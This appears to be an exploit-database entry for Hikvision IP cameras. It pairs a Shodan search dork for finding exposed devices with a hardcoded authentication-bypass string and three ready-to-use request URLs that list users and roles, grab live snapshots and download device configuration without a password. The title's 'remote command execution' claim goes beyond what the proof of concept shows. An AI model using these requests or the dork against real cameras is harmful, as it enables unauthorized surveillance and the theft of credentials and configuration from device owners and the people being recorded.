# Exploit Title: Exploit Title: Hikvision Camera - Remote command execution
# Date: 4/22/2024
# Google Dork : In Shodan search engine, the filter is "Web Version="3.1.3.150324" http.favicon.hash:999357577"
# Exploit Author: parsa rezaie khiabanloo
# Tested on: Windows/Linux
# 1. Description:
Hikvision included a magic string that allowed instant access to any camera, regardless of what the admin password was. All that needed was appending this string to Hikvision camera commands: (?auth=YWRtaW46MTEK).
# An issue was discovered in Hikvision IP Camera.
# 2 . Proof of Concept:
Retrieve a list of all users and their roles:
- http://camera.ip/Security/users?auth=YWRtaW46MTEK
Obtain a camera snapshot without authentication:
- http://camera.ip/onvif-http/snapshot?auth=YWRtaW46MTEK
Download camera configuration:
- http://camera.ip/System/configurationFile?auth=YWRtaW46MTEK